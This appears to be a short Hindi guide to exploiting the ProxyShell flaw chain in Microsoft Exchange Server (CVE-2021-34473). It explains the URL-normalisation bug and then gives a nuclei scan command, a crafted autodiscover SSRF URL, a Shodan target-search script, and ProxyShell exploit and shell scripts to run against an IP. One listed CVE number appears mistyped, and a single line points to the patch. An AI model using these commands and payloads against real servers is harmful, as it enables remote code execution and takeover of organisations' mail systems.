
CVE-2021-34473 Microsoft Exchange Server रिमोट कोड निष्पादन भेद्यता
CVE-2021-34473 माइक्रोसॉफ्ट एक्सचेंज सर्वर रिमोट कोड निष्पादन भेद्यता। यह दोषपूर्ण URL सामान्यीकरण हमें एक्सचेंज सर्वर मशीन खाते के रूप में चलते हुए एक मनमाना बैकएंड URL तक पहुंचने देता है। हालांकि यह बग ProxyLogon में SSRF जितना शक्तिशाली नहीं है, और हम URL के केवल पथ भाग में हेरफेर कर सकते हैं, फिर भी यह हमारे लिए मनमाना बैकएंड एक्सेस के साथ आगे के हमले करने के लिए पर्याप्त शक्तिशाली है।
nuclei स्कैनर Proxyshell RCE (CVE-2021-34423, CVE-2021-34473, CVE-2021-31207) के लिए, जिसे orange tsai ने Pwn2Own में खोजा, जो माइक्रोसॉफ्ट एक्सचेंज सर्वर को प्रभावित करता है।
nuclei -u target.com -t proxyshell.yaml
https://xxx.xxx.xxx.xxx/autodiscover/[email protected]/mapi/nspi/?&Email=autodiscover/autodiscover.json%[email protected]
sudo python3 shodan-query.py
sudo python3 ProxyShell.py -u https://<IP>
python2 /manual/check.py
sudo python3 /manual/proxyshell.py
python2 /manual/shell.py
यहाँ मिलने वाले सुरक्षा अद्यतन लागू करें: CVE-2021-34473